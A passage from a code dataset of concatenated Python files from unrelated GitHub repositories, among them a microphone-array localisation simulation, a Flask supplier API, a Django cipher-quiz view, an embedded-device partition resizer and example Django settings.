15), rpad(temp_list[2], 10))\n print(out)\n print(\"-----------------------------------------------------------------\")\n\n return item\n\n elif isinstance(item, BlockItem):\n temp = dict(item)\n for i in range(5):\n name = temp[\"rise_{}\".format(i + 1)]\n data = temp[\"rise_{}_data\".format(i + 1)]\n if i < 4:\n print(name, \"+\", data, \"%\", \"、\", end='')\n else:\n print(name, \"+\", data, \"%\")\n\n return item\n\n elif isinstance(item, Block1Item):\n temp = dict(item)\n for i in range(5):\n name = temp[\"drop_{}\".format(i + 1)]\n data = temp[\"drop_{}_data\".format(i + 1)]\n if i < 4:\n if data < 0:\n print(name, data, \"%\", \"、\", end='')\n else:\n print(name, \"+\", data, \"%\", \"、\", end='')\n else:\n if data < 0:\n print(name, data, \"%\")\n else:\n print(name, \"+\", data, \"%\")\n return item\n\n elif isinstance(item, IndexItem):\n temp = dict(item)\n temp_list = [temp[\"name\"], temp[\"index\"], temp[\"percent\"], temp[\"data\"]]\n if temp_list[2][0] == '-':\n temp_list[0] = (Fore.GREEN + temp_list[0] + Style.RESET_ALL)\n temp_list[1] = (Fore.GREEN + temp_list[1] + \"↓\" + Style.RESET_ALL)\n temp_list[2] = (Fore.GREEN + temp_list[2] + 
\"%\" + Style.RESET_ALL)\n temp_list[3] = (Fore.GREEN + temp_list[3] + Style.RESET_ALL)\n else:\n temp_list[0] = (Fore.LIGHTRED_EX + temp_list[0] + Style.RESET_ALL)\n temp_list[1] = (Fore.LIGHTRED_EX + temp_list[1] + \"↑\" + Style.RESET_ALL)\n temp_list[2] = (Fore.LIGHTRED_EX + temp_list[2] + \"%\" + Style.RESET_ALL)\n temp_list[3] = (Fore.LIGHTRED_EX + temp_list[3] + Style.RESET_ALL)\n out = \"{} {} {} {}\".format(rpad(temp_list[0], 2), rpad(temp_list[1], 3), rpad(temp_list[2], 2), rpad(temp_list[3], 2))\n print(out)\n return item\n","repo_name":"yuanl1u/Fund-Surveillance","sub_path":"tutorial/tutorial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40486044367","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 7 20:38:58 2020\n\n@author: davi\n\"\"\"\n\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nfrom multilateration_algorithms import *\nfrom shot import *\n\ndef cil2car(r, theta, z):\n ''' \n changes from cylindrical coordinates to Cartesian coordinates\n obs: theta in radians\n '''\n x = r*np.cos(theta)\n y = r*np.sin(theta)\n return np.array([x, y, z])\n\ndef car2sph(x, y, z):\n ''' \n changes from Cartesian coordinates to spherical coordinates\n obs: theta, phi in degrees\n '''\n if ((x, y, z) == (0, 0, 0)): return np.zeros(3)\n epsilon = 1e-17 # avoid division by zero\n \n R = np.sqrt(x**2 + y**2 + z**2)\n theta_rad = np.arctan(y/(x + epsilon))\n phi_rad = np.arccos(z/(R + epsilon))\n \n theta = (theta_rad/(2*np.pi)) * 360 \n phi = (phi_rad/(2*np.pi)) * 360\n return np.array([R, theta, phi])\n\ndef sph2car(R, phi, theta):\n ''' \n changes from spherical coordinates to Cartesian coordinates\n R : radius\n phi : azimuth angle in radians\n theta : elevation angle in radians\n \n return ndarray with x,y,z Cartesian coordinates\n '''\n x = R*np.sin(theta)*np.cos(phi)\n y = R*np.sin(theta)*np.sin(phi)\n z = R*np.cos(theta)\n return np.array([x, y, z])\n\n# generate cilindrical sources cloud\nr = np.linspace(1, 15, 15) # r is in [1,15] with steps of 1\ntheta = np.linspace(0, 2*np.pi, 24, endpoint=False) # r is in [0,360) with steps of 15 degrees\nz = np.linspace(0, 6, 7) # z is in [-3,3] with steps of 1\n\ncilinder = itertools.product(r, theta, z)\n\n# generate spherical sources cloud\nR = np.linspace(1,15,15)\nphi = np.linspace(0, 2*np.pi,24, endpoint=False)\ntheta = np.linspace(0, np.pi/2, 12, endpoint=True)\n\nnPoints = len(R) * len(phi) * len(theta)\n\n# generate parallelepiped\nX = np.linspace(-10,10,21)\nY = np.linspace(-10,10,21)\nZ = np.linspace(0,10,11)\n\n#nPoints = len(X) * len(Y) * len(Z)\n\n#square (4 microphones)\nsquare_array = np.zeros((4,3))\n\nsquare_array[0] = np.array([-1, 1, 1])\nsquare_array[1] = np.array([-1, -1, -1])\nsquare_array[2] = np.array([1, 1, -1])\nsquare_array[3] = np.array([1, -1, -1])\n#square_array[4] = np.array([0, 0, -1])\n#square_array[5] = np.array([-1, 1, -1])\n\n#our array\nour_array = np.zeros((4,3))\n\nour_array[0] = np.array([-0.83, -0.48, -0.18])\nour_array[1] = np.array([ 0.97, -0.03, 0.23])\nour_array[2] = np.array([ 0.20, 0.20, -0.14])\nour_array[3] = np.array([-0.03, 0.99, -0.12])\n\n#our array2\n\nour_array2 = np.array([[-0.12620505, -0.63363287, -0.15411901],\n [ 0.38171208, -0.03580296, -0.19768694],\n [ 0.02742979, -0.31217145, -0.08820106],\n [-0.48513401, -0.16910477, -0.27557907]])\n\n#spherical 
(6 microphones)\nspherical_array = np.zeros((6,3))\nspherical_array[0] = np.array([0, 0, 1.5])\nspherical_array[1] = np.array([1, 1, 1])\nspherical_array[2] = np.array([1, -1, 1])\nspherical_array[3] = np.array([-1, 1, 1])\nspherical_array[4] = np.array([-1, -1, 1])\nspherical_array[5] = np.array([0, 0, 0.5])\n\nm = np.array([1, 1, 1, 1, 1, 1])\ne = np.array([0.1, 0.1, 0.1, 0.1, 0.1, 0.1])\n\n# arrays evaluation\nsampleRate = 120000\nsamples = int(sampleRate/2) \narrays = (our_array, our_array2)\nbig_error = [[]]*len(arrays)\n\nfor i,array in enumerate(arrays):\n count=0\n aux = []\n l,_ = np.shape(array)\n #parallelepiped = itertools.product(X, Y, Z)\n semi_sphere = itertools.product(R, phi, theta)\n for (a, b, c) in semi_sphere:\n #source = np.array([a, b, c]) + 0.05*np.random.randn(3)\n source = sph2car(a, b, c) + 0.05*np.random.randn(3)\n \n toa = dist(source, array)/soundSpeed\n tdoa = toa[0] - toa[1:,] \n \n tdoa = np.round(tdoa*sampleRate)/sampleRate\n '''rand = (2*np.random.rand(samples) - 1) # Random vector between 1 and -1\n \n def shot (t):\n decayConst = -10\n relu = (t>=0)\n index = np.sum(~relu)\n r = np.append(np.zeros(index), rand[0:rand.shape[0]-index])\n return r * np.exp(decayConst * t) * relu\n \n tdoa, _ = delayEstimator (shot, sampleRate, source, array, typeComb = \"\")'''\n result = MLE_HLS(array, tdoa, sampleRate, typeComb=\"\")\n \n error = float(dist(source, result))\n #if dist(source, result) > 4.0: big_error.append(source)\n aux.append(error)\n \n count+=1\n if count%500==0: print(count)\n big_error[i] = aux\nbig_error = [sorted(elem) for elem in big_error]\nbig_error = np.array(big_error)\nmle = np.sum(big_error**2, axis=1)/nPoints\n\nplt.title(\"Distance distribution for arrays\")\nplt.plot(big_error[0], c='blue')\nplt.plot(big_error[1], c='green')\nplt.legend([f\"square array(MLE={mle[0]:.2f})\", f\"our array(MLE={mle[1]:.2f})\"])\nplt.xlabel(\"source number\")\nplt.ylabel(\"distance\")\nplt.yscale(\"log\")\nplt.grid()\nplt.show()\n\n","repo_name":"matheussfarias/iOwlT-simulation","sub_path":"arrays_simulation_distribution.py","file_name":"arrays_simulation_distribution.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41011008807","text":"\ndef op_1(command_index, memory):\n\n arg1i = memory[command_index + 1]\n arg2i = memory[command_index + 2]\n resi = memory[command_index + 3]\n\n memory[resi] = memory[arg1i] + memory[arg2i]\n\n return command_index + 4\n\n\ndef op_2(command_index, memory):\n\n arg1i = memory[command_index + 1]\n arg2i = memory[command_index + 2]\n resi = memory[command_index + 3]\n\n memory[resi] = memory[arg1i] * memory[arg2i]\n\n return command_index + 4\n\n\ncommand_to_func = {\n 1: op_1,\n 2: op_2,\n}\n\ndef run_program(memory):\n\n command_index = 0\n\n while True:\n\n command = memory[command_index]\n\n if command == 99:\n break\n else:\n func = command_to_func[command]\n\n command_index = func(command_index, memory)\n\n\ndef run_with_mods(noun, verb, initial_memory):\n memory = initial_memory.copy()\n\n memory[1] = noun\n memory[2] = verb\n\n run_program(memory)\n\n return memory[0]\n\n\nif __name__ == \"__main__\":\n\n with open(\"input.txt\") as file:\n intext = file.read()\n \n splittext = intext.split(\",\")\n memory = [ int(command) for command in splittext ]\n\n successful_params = None\n\n for noun in range(0,100):\n for verb in range(0,100):\n\n result = run_with_mods(noun, verb, memory)\n\n if result == 19690720:\n 
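# 19690720 is the target output named by the puzzle (the Apollo 11\n # landing date); record the pair and break out of both loops.\n 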
successful_params = (noun, verb)\n break\n\n if successful_params is not None:\n break\n\n success_noun, success_verb = successful_params\n success_num = (100 * success_noun) + success_verb\n print(success_num)\n ","repo_name":"SimonMarkWhittle/advent_of_code19","sub_path":"day2/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36201573856","text":"from flask import jsonify\nfrom flask_login import login_required\nfrom app.api import api\nfrom app.utils import get_json_from_request\nfrom app.api.suppliers import get_supplier, update_supplier, list_suppliers\nfrom app.api.helpers import role_required, is_current_supplier\n\n\n@api.route('/suppliers/', methods=['GET'], endpoint='get_supplier')\n@login_required\n@role_required('buyer', 'supplier')\n@is_current_supplier\ndef get(code):\n \"\"\"A supplier (role=buyer,supplier)\n ---\n tags:\n - suppliers\n security:\n - basicAuth: []\n parameters:\n - name: code\n in: path\n type: integer\n required: true\n default: all\n definitions:\n SupplierService:\n type: object\n properties:\n id:\n type: integer\n name:\n type: string\n subCategories:\n type: array\n items:\n $ref: '#/definitions/SupplierCategory'\n SupplierCategory:\n type: object\n properties:\n id:\n type: integer\n name:\n type: string\n Supplier:\n type: object\n properties:\n abn:\n type: string\n address_address_line:\n type: string\n address_country:\n type: string\n address_postal_code:\n type: string\n address_state:\n type: string\n address_suburb:\n type: string\n category_name:\n type: string\n code:\n type: string\n contact_email:\n type: string\n contact_name:\n type: string\n contact_phone:\n type: string\n email:\n type: string\n id:\n type: number\n linkedin:\n type: string\n name:\n type: string\n phone:\n type: string\n regions:\n type: array\n items:\n type: object\n properties:\n name:\n type: string\n state:\n type: string\n representative:\n type: string\n services:\n type: array\n items:\n $ref: '#/definitions/SupplierService'\n summary:\n type: string\n website:\n type: string\n responses:\n 200:\n description: A supplier\n type: object\n schema:\n $ref: '#/definitions/Supplier'\n \"\"\"\n return get_supplier(code)\n\n\n@api.route('/suppliers/', methods=['POST'], endpoint='update_supplier')\n@login_required\n@role_required('buyer', 'supplier')\n@is_current_supplier\ndef update(code):\n \"\"\"Update a supplier (role=buyer,supplier)\n ---\n tags:\n - suppliers\n security:\n - basicAuth: []\n parameters:\n - name: code\n in: path\n type: integer\n required: true\n default: all\n responses:\n 200:\n description: A supplier\n type: object\n schema:\n $ref: '#/definitions/Supplier'\n \"\"\"\n try:\n json_payload = get_json_from_request()\n supplier = update_supplier(code, **json_payload)\n\n return jsonify(supplier.serializable), 200\n\n except Exception as error:\n return jsonify(message=error.message), 400\n\n\n@api.route('/suppliers', methods=['GET'], endpoint='list_suppliers')\n@login_required\n@role_required('buyer')\ndef get_list():\n \"\"\"All suppliers grouped by category (role=buyer)\n ---\n tags:\n - suppliers\n security:\n - basicAuth: []\n responses:\n 200:\n description: A supplier\n type: object\n properties:\n categories:\n type: array\n items:\n type: object\n properties:\n name:\n type: string\n suppliers:\n type: array\n items:\n type: object\n properties:\n code:\n type: integer\n name:\n type: string\n \"\"\"\n 
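# The view itself only layers access control on top (login_required plus\n # role_required('buyer')); the grouping work is delegated below.\n 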
return list_suppliers()\n","repo_name":"shanec1802/orams","sub_path":"backend/app/api/views/suppliers.py","file_name":"suppliers.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"19530656625","text":"from django.shortcuts import render\nfrom .models import CnsQuiz\nfrom django.http import HttpResponse\n\n# Create your views here.\n\ndef cnsLab(request):\n result = CnsQuiz.objects.all()\n data = {'Exams': result}\n return render(request, 'cnsLab/index.html', data)\n\ndef encrpyText(request):\n encrptionText = request.GET.get('text', 'default')\n keyvalue = request.GET.get('keyvalue', 'default')\n cipherText = request.GET.get('cipherText', 'default')\n \n convertedInput = []\n convertedOutput = []\n if keyvalue == \"3\":\n for char in encrptionText:\n convertedInput.append(ord(char))\n\n finalInput = [x + 3 for x in convertedInput]\n \n for char in cipherText:\n convertedOutput.append(ord(char))\n params = {'cipherText': cipherText, 'encrptionText': encrptionText}\n # Compare the full sequences: order matters when checking a Caesar\n # cipher, so multiset (Counter) equality would wrongly accept anagrams.\n if finalInput == convertedOutput:\n return render(request, 'cnsLab/result.html', params)\n else:\n message = \"You tried well but your answer is incorrect\"\n params = {'cipherText': cipherText, 'encrptionText': encrptionText, 'message': message}\n return render(request, 'cnsLab/result.html', params)\n else:\n return HttpResponse(\"failure\")\n","repo_name":"kushal-chaurasia/virtual-lab","sub_path":"cnsLab/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"71571001014","text":"#!/usr/bin/env python3\n\n#\n# ** License **\n#\n# Home: http://resin.io\n#\n# Author: Andrei Gherzan \n#\n\nimport sys\nimport logging\nimport parted\nimport os\nimport tempfile\nimport unittest\nimport shutil\nfrom .util import *\nfrom .bootconf import *\nfrom .colorlogging import *\n\nclass Repartitioner(object):\n def __init__ (self, conf, testMode=False):\n self.conf = conf\n self.testMode = testMode\n self.resinBootPartPath = getBootPartition(conf)\n self.currentResinRootPartPath = getRootPartition(conf)\n\n self.device = parted.getDevice(getRootDevice(conf))\n self.disk = parted.newDisk(self.device)\n\n def editPartition(self, targetPartition, deltaStart, deltaEnd, fstype, fslabel, unit='MiB', formatPartition=True, safeDataThroughTmp=False):\n log.info("editPartition: Editing partition " + targetPartition.path + ". Start = Start + (" + str(deltaStart) + "). 
End = End + (\" + str(deltaEnd) + \").\")\n\n # Backup data to a directory in tmp\n if safeDataThroughTmp:\n # Make sure targetPartition is mounted in mountpoint\n if isMounted(targetPartition.path):\n mountpoint = getMountpoint(targetPartition.path)\n else:\n try:\n mountpoint = tempfile.mkdtemp(prefix='resinhup-', dir='/tmp')\n except:\n log.error(\"editPartition: Failed to create temporary mountpoint.\")\n return False\n if not mount(targetPartition.path, mountpoint):\n log.error(\"editPartition: Failed to mount %s in %s.\" %(targetPartition.path, mountpoint))\n return False\n\n # Backup files to a directory in /tmp\n try:\n backupdir = tempfile.mkdtemp(prefix='resinhup-', dir='/tmp')\n except:\n log.error(\"editPartition: Failed to create temporary backup directory.\")\n return False\n if not safeCopy(mountpoint, backupdir):\n log.error(\"editPartition: Could not backup files from %s to %s.\" %(mountpoint, backupdir))\n\n # Make sure that partition is not mounted\n if isMounted(targetPartition.path):\n if not umount(targetPartition.path):\n return False\n\n # Committing partition changes to OS needs udev running\n startUdevDaemon()\n\n # Calculate the new geometry\n geometry = targetPartition.geometry\n geometry.start += parted.sizeToSectors(deltaStart, unit, self.device.sectorSize)\n geometry.end += parted.sizeToSectors(deltaEnd, unit, self.device.sectorSize)\n\n # Destroy the partition and recreate it with the new geometry\n self.disk.deletePartition(targetPartition)\n filesystem = parted.FileSystem(type=fstype, geometry=geometry)\n partition = parted.Partition(disk=self.disk, type=parted.PARTITION_NORMAL, fs=filesystem, geometry=geometry)\n self.disk.addPartition(partition=partition, constraint=self.device.optimalAlignedConstraint)\n self.disk.commit()\n\n # Format filesystem\n if formatPartition:\n if (fstype == 'ext3') or (fstype == 'ext4'):\n if not formatEXT3(partition.path, fslabel):\n log.error(\"movePartition: Could not format \" + partition.path + \" as ext3.\")\n return False\n elif fstype == 'fat32':\n if not formatVFAT(partition.path, fslabel):\n log.error(\"movePartition: Could not format \" + partition.path + \" as vfat.\")\n return False\n else:\n log.error(\"movePartition: Format of \" + fstype + \" is not implemented.\")\n return False\n\n # Restore data in targetPartition\n if safeDataThroughTmp:\n # Make sure targetPartition is mounted in mountpoint\n if isMounted(targetPartition.path):\n log.error(\"editPartition: Something is wrong. 
%s should not be mounted.\" % targetPartition.path)\n return False\n else:\n if not mount(targetPartition.path, mountpoint):\n log.error(\"editPartition: Failed to mount %s in %s.\" %(targetPartition.path, mountpoint))\n return False\n\n # Copy back the data\n if not safeCopy(backupdir, mountpoint, sync=True):\n log.error(\"editPartition: Could not restore files from %s to %s.\" %(backupdir, mountpoint))\n\n # Cleanup temporary backup files\n shutil.rmtree(backupdir)\n\n return True\n\n def increaseResinBootTo(self, size, unit='MiB'):\n #\n # +----------------------------------------+---+\n # | Boot from resin-root | |\n # +-------->+ length(resin-root)!=length(resin-updt) | E |\n # +----------------------------------------+---+\n #\n #\n #\n #\n #\n #\n # a1 - shrink resin-updt from left\n # a2 - copy resin-root to resin-updt\n # a3 - configure bootloader to boot from resin-updt\n # +----------------------------------------+---+ a4 - reboot system +----------------------------------------+---+\n # | Boot from resin-root | | | Boot from resin-updt | |\n # +--------->+ length(resin-root)==length(resin-updt) | A +-----------------------------------------------------------^+ length(resin-root)!=length(resin-updt) | C |\n # +-----+----------------------------------+---+ +------+---------------------------------+---+\n # ^ |\n # | |\n # | b1 - copy resin-updt to resin-root | c1 - shrink and move resin-boot\n # | b2 - configure bootloader to boot from resin-root | c2 - expand resin-boot\n # | b3 - reboot system +\n # | V\n # +-----+----------------------------------+---+ +--------------------------+\n # | Boot from resin-updt | | | Done |\n # +--------->+ length(resin-root)==length(resin-updt) | B | | resin-boot expanded |\n # +----------------------------------------+---+ +--------------------------+\n #\n log.info(\"increaseResinBootTo: Increasing boot partition to \" + str(size) + \".\")\n\n resinBootPart = self.disk.getPartitionByPath(self.resinBootPartPath)\n resinRootPart = self.disk.getPartitionByPath(getPartitionRelativeToBoot(self.conf, 'resin-root', 1)) # resin-root is the first partition after resin-boot\n resinUpdtPart = self.disk.getPartitionByPath(getPartitionRelativeToBoot(self.conf, 'resin-updt', 2)) # resin-updt is the second partition after resin-boot\n\n # How much we need to increase resin-boot\n deltasize = int(size) - int(resinBootPart.getLength(unit))\n\n # Are we there yet?\n if resinBootPart.getLength(unit) >= size:\n # State D\n log.debug(\"increaseResinBootTo: Size already greater than \" + str(size) + unit + \".\")\n return True\n\n if self.currentResinRootPartPath == resinRootPart.path:\n # Booted from resin-root\n if resinRootPart.getLength(unit) == resinUpdtPart.getLength(unit):\n #\n # State A\n #\n log.debug(\"Running transition from State A...\")\n\n # Edit resin-updt partition\n if not self.editPartition(targetPartition=resinUpdtPart, deltaStart=(deltasize // 2), deltaEnd=0, fstype='ext4', fslabel='resin-updt', unit=unit, formatPartition=True):\n log.error(\"increaseResinBootTo: Could not edit resin-updt partition.\")\n return False\n\n # Copy resin-root to resin-updt\n log.info(\"increaseResinBootTo: Copying resin-root to resin-updt. 
This will take a while...\")\n resinRootMountPoint = getConfigurationItem(self.conf, 'General', 'host_bind_mount')\n if not resinRootMountPoint:\n resinRootMountPoint = '/'\n try:\n resinUpdtMountPoint = tempfile.mkdtemp(prefix='resinhup-', dir='/tmp')\n except:\n log.error(\"increaseResinBootTo: Failed to create temporary mountpoint.\")\n return False\n if not mount(resinUpdtPart.path, resinUpdtMountPoint):\n log.error(\"increaseResinBootTo: Failed to mount \" + resinUpdtPart.path + \" to \" + resinUpdtMountPoint + \".\")\n if not safeCopy(resinRootMountPoint, resinUpdtMountPoint, sync=False):\n log.error(\"increaseResinBootTo: Failed to copy files from \" + resinRootMountPoint + \" to \" + resinUpdtMountPoint + \".\")\n umount(resinUpdtMountPoint) # We fail anyway so don't care out return value\n return False\n if not umount(resinUpdtMountPoint):\n log.error(\"increaseResinBootTo: Failed to unmount \" + resinUpdtMountPoint + \".\")\n return False\n\n # Configure bootloader\n if not configureBootloader(self.currentResinRootPartPath, resinUpdtPart.path, self.conf):\n log.error(\"increaseResinBootTo: Could not configure bootloader.\")\n return False\n\n # We exit cause this is an intermediate repartitioning step and reboot is needed\n if not self.testMode:\n sys.exit(2)\n else:\n #\n # State E\n #\n log.debug(\"Running transition from State E...\")\n\n log.error(\"increaseResinBootTo: Unknown filesystem state where booted from resin-boot but having different size then resin-updt.\")\n return False\n\n elif self.currentResinRootPartPath == resinUpdtPart.path:\n # Booted from resin-updt\n if resinRootPart.getLength(unit) == resinUpdtPart.getLength(unit):\n #\n # State B\n #\n log.debug(\"Running transition from State B...\")\n\n # Format resin-root\n if not formatEXT3(resinRootPart.path, 'resin-root'):\n log.error(\"increaseResinBootTo: Could not format \" + resinRootPart.path + \" as ext3.\")\n return False\n\n # Copy resin-updt to resin-root\n log.info(\"increaseResinBootTo: Copying resin-updt to resin-root. 
This will take a while...\")\n resinUpdtMountPoint = getConfigurationItem(self.conf, 'General', 'host_bind_mount')\n if not resinUpdtMountPoint:\n resinUpdtMountPoint = '/'\n try:\n resinRootMountPoint = tempfile.mkdtemp(prefix='resinhup-', dir='/tmp')\n except:\n log.error(\"increaseResinBootTo: Failed to create temporary mountpoint.\")\n return False\n if not mount(resinRootPart.path, resinRootMountPoint):\n log.error(\"increaseResinBootTo: Failed to mount \" + resinRootPart.path + \" to \" + resinRootMountPoint + \".\")\n if not safeCopy(resinUpdtMountPoint, resinRootMountPoint, sync=False):\n log.error(\"increaseResinBootTo: Failed to copy files from \" + resinUpdtMountPoint + \" to \" + resinRootMountPoint + \".\")\n umount(resinRootMountPoint) # We fail anyway so don't care out return value\n return False\n if not umount(resinRootMountPoint):\n log.error(\"increaseResinBootTo: Failed to unmount \" + resinRootMountPoint + \".\")\n return False\n\n # Configure bootloader\n if not configureBootloader(self.currentResinRootPartPath, resinRootPart.path, self.conf):\n log.error(\"increaseResinBootTo: Could not configure bootloader.\")\n return False\n\n # We exit cause this is an intermediate repartitioning step and reboot is needed\n if not self.testMode:\n sys.exit(2)\n else:\n #\n # State C\n #\n log.debug(\"Running transition from State C...\")\n\n # Edit resin-root partition\n if not self.editPartition(targetPartition=resinRootPart, deltaStart=(deltasize), deltaEnd=(deltasize // 2), fstype='ext4', fslabel='resin-root', unit=unit, formatPartition=True):\n log.error(\"increaseResinBootTo: Could not edit resin-root partition.\")\n return False\n\n # Expand resin-boot\n if not self.editPartition(targetPartition=resinBootPart, deltaStart=0, deltaEnd=deltasize, fstype='fat32', fslabel='resin-boot', unit=unit, formatPartition=True, safeDataThroughTmp=True):\n log.error(\"increaseResinBootTo: Could not edit resin-boot partition.\")\n return False\n\n return True\n else:\n log.error(\"increaseResinBootTo: Unknown root partition.\")\n return False\n\n return True\n\nclass MyTest(unittest.TestCase):\n def testRun(self):\n # Logger\n log = logging.getLogger()\n log.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n ch.setFormatter(ColoredFormatter(True))\n log.addHandler(ch)\n\n # Hope this works :)\n r = Repartitioner(conf='conf/resinhup.conf', testMode=True) # Running this in test mode to avoid rebooting automatically\n self.assertTrue(r.increaseResinBootTo(22))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"balena-os/balenahup","sub_path":"app/modules/repartitioner.py","file_name":"repartitioner.py","file_ext":"py","file_size_in_byte":15033,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"21"} +{"seq_id":"24330910513","text":"import os\nfrom django.contrib.messages import constants as messages\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = ''\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.sites',\n 
'django.contrib.staticfiles',\n\n 'bootstrap4',\n 'core',\n 'product',\n 'order',\n 'feedback',\n\n 'mptt',\n\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'allauth.socialaccount.providers.facebook',\n 'allauth.socialaccount.providers.google',\n 'allauth.socialaccount.providers.vk',\n]\n\nLOGIN_REDIRECT_URL = '/'\nSITE_ID = 1\n\nACCOUNT_LOGIN_ATTEMPTS_LIMIT = 5\nACCOUNT_LOGIN_ATTEMPTS_TIMEOUT = 60\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_USERNAME_REQUIRED = False\nACCOUNT_AUTHENTICATION_METHOD = 'email'\n\nAUTHENTICATION_BACKENDS = [\n 'django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nMESSAGE_TAGS = {\n messages.DEBUG: 'alert-secondary',\n messages.INFO: 'alert-info',\n messages.SUCCESS: 'alert-success',\n messages.WARNING: 'alert-warning',\n messages.ERROR: 'alert-danger',\n}\n\nROOT_URLCONF = 'e_shop.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'product.context_processors.category_tree',\n 'product.context_processors.feedback_form',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'e_shop.wsgi.application'\n\n\n# Database\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# Password validation\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n\nLANGUAGE_CODE = 'ru'\n\nTIME_ZONE = 'Asia/Bishkek'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nUSE_THOUSAND_SEPARATOR = True\n\n# Static files (CSS, JavaScript, Images)\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n","repo_name":"aitmrza/e_shop","sub_path":"e_shop/example_settings.py","file_name":"example_settings.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70466471092","text":"# Code to import and run epc1d functions\n\nfrom epc1d_Opt2 import *\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks\nimport numpy as np\nfrom matplotlib.pyplot import cm\nfrom timeit import default_timer as timer\nfrom scipy.stats import linregress\n\ndef r_squared(data, fit):\n\t\"\"\" Calculate the R^2 value of a fit, f, to a data set, x \"\"\"\n\t\n\tif len(data) != len(fit):\n\t\tprint(\"Data and fit lists must be of equal length\")\n\t\treturn None\n\n\tm = np.sum(data)/len(data)\n\t\n\t# Sum of squares 
between data and mean\n ss = np.sum((data-m)**2)\n \n # Sum of residuals between fit and data\n res = np.sum((data-fit)**2)\n \n # This is the definition of R^2\n return 1 - res/ss\n\ndef task1_noiseAmplitude(noiseLevelThresholdR, L, ncells, npart):\n plt.show()\n samples = len(noiseLevelThresholdR)\n plt.boxplot(noiseLevelThresholdR)\n plt.ylabel(\"Noise Amplitude Threshold\")\n plt.title(\"L={0:.2f}; ncells={1}; npart={2}; samples={3}\".format(L,ncells,npart,samples))\n plt.suptitle(\"Landau Damping Noise Amplitude Threshold: Boxplot\")\n print(\"Mean noiseAmplitudes: \", np.mean(noiseLevelThresholdR))\n print(\"SD Sample noiseAmplitudes: \", np.std(noiseLevelThresholdR, ddof=1))\n print(\"SE Sample noiseAmplitudes: \", np.std(noiseLevelThresholdR, ddof=1)/np.sqrt(samples))\n plt.show()\n\ndef task1_noiseAmplitudeCells(noiseLevelThresholdR, L, ncellsR, npart, samples):\n\n # Preprocess, initialise\n ncellsUniqueSorted = np.unique(ncellsR)\n means = np.zeros(len(ncellsUniqueSorted))\n stdErrs = np.zeros(len(ncellsUniqueSorted))\n stdDevsSample = np.zeros(len(ncellsUniqueSorted))\n\n # Calculate standard errors and means\n for iNcell in range(len(ncellsUniqueSorted)):\n means[iNcell] = np.mean(noiseLevelThresholdR[np.where(ncellsR == ncellsUniqueSorted[iNcell])])\n stdDevsSample[iNcell] = np.std(noiseLevelThresholdR[np.where(ncellsR == ncellsUniqueSorted[iNcell])], ddof=1)\n stdErrs = stdDevsSample/np.sqrt(samples)\n\n # Polynomial fit\n ncellsNoiseFitCoeffs = np.polyfit(ncellsUniqueSorted, means, 2)\n ncellsNoiseFitF = 